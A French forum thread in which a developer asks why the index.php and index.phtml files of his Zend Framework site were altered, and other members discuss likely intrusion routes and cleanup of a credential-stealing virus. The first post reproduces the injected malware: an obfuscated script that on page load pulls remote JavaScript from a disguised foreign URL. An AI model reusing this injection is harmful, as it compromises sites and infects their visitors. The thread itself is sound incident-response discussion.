Consultez la FAQ sur le ZF avant de poster une question
Vous n'êtes pas identifié.
Bonjour,
Je sais que cette question est un peu hors contexte, mais je ne vois pas comment faire. J'ai eu la désagréable aventure de voir qu'on avais modifé (on ne sais qui) le index.php d'un site que je suis en train de développer :
<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src', 'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>
- le ftp n'est pas facile à découvrir
- le fai privé me dis que les logs sont ok
Quelqu'un a déjà eu çà ?
Merci
F.
Hors ligne
Je croise les doigts, ça ne m'est encore jamais arrivé (ou bien je ne l'ai pas vu...).
A priori, il y a plusieurs façons de faire ce genre de trucs :
* soit il a eu accès à ton FTP, dans ce cas, change ton passwd...
* soit il est entré par le site (et ton FAI ne peut pas forcément le voir). Il y a pas mal de façons de faire
- si tu as des uploads de fichiers, fais attention que l'internaute ne puisse pas uploader un fichier php et l'exécuter
- vérifie que tu ne fais pas de include d'un fichier dont le nom construit avec des paramètres POST en GET, dans l'URL ou dans un cookie
- vérifie que tu n'utilises pas de librairie / outil pas à jour (genre un vieux PHPBB, Wordpress, ZF, phpmyadmin,... ou n'importe quoi pas à jour)
- si la plateforme de ton FAI n'est pas à jour il peut peut-être utiliser des failles d'apache, php, glibc... là c'est assez imprévisible
Bref, c'est une super galère...
Si tu as moyen de changer les droits de tes fichiers pour que seul un répertoire "data" soit autorisé en écriture depuis le serveur web, ça limite déjà un peu les dégats...
A+ et bon courage,
Philippe
Hors ligne
hello,
Merci pour ces infos
- j'ai changé le ftp
- les fichiers uploadés sont seulement des .jpg, et je filtre aussi la taille
- je fais de url rewriting donc pas de soucis de changement d'id ou autres dans les get , etc
- j'utilise uniquement ZF et phpThumbs (http://phpthumb.gxdlabs.com)
Pour le FAI, j'en sais trop rien...
Fabrice
Dernière modification par __fabrice (08-12-2009 10:15:08)
Hors ligne
regarde quand même tes versions de PHP, phpThumb et ZF et fouille dans google pour voir s'il n'y a pas de faille recensées, ça peut arriver.
Si jamais tu trouves un gros problème dans phpThumb, préviens moi, j'aurais un ou 2 projets à revoir
A+, Philippe
Hors ligne
la version de Zend est la dernier, en tout cas la 1.9. Celle de phpThumb aussi. Et php, php 5.2.x.
Je viens de m'apercevoir que ce n'est pas seulement le fichier index.php, mais tous les index.phtml !!!
F.
Hors ligne
Hello,
Il me semble me souvenir d'avoir eu le problème sur un paquet de sites que je gère, et le soucis venais d'une salo**rie de virus/spyware.
La bébête pompait mes logs FTP (tapés à la mano ou enregistrés dans mon client FTP) et scannait les dossiers / sous-dossier avec un filtre du genre ((default|index|home)\.([a-z]?(htm|php|asp|xml)[a-z]?)) et rajoutait au choix:
- une iframe
- du javascript
- du html + css
...
dans le code source, pas forcément de manière "efficace" (fichier tronqués, balises insérée aléatoirement dans la source ...)
Dans mon cas la solution a été :
- Gros nettoyage dans les fichiers temp/cache, scan minutieux avec l'antivirus, petit check-up avec SpyBot et nettoyage avec HijackThis!
- Une fois tout nettoyé, changement des infos FTP sur tout les sites géré depuis ce poste.
Hors ligne
salut,
Ok, je suis en train de checker çà, mais j'ai trouvé un fichier étrange, qui se lance au démarrage, et qui a l'air de s'être greffé au svchost.exe.
Je continu
F.
Hors ligne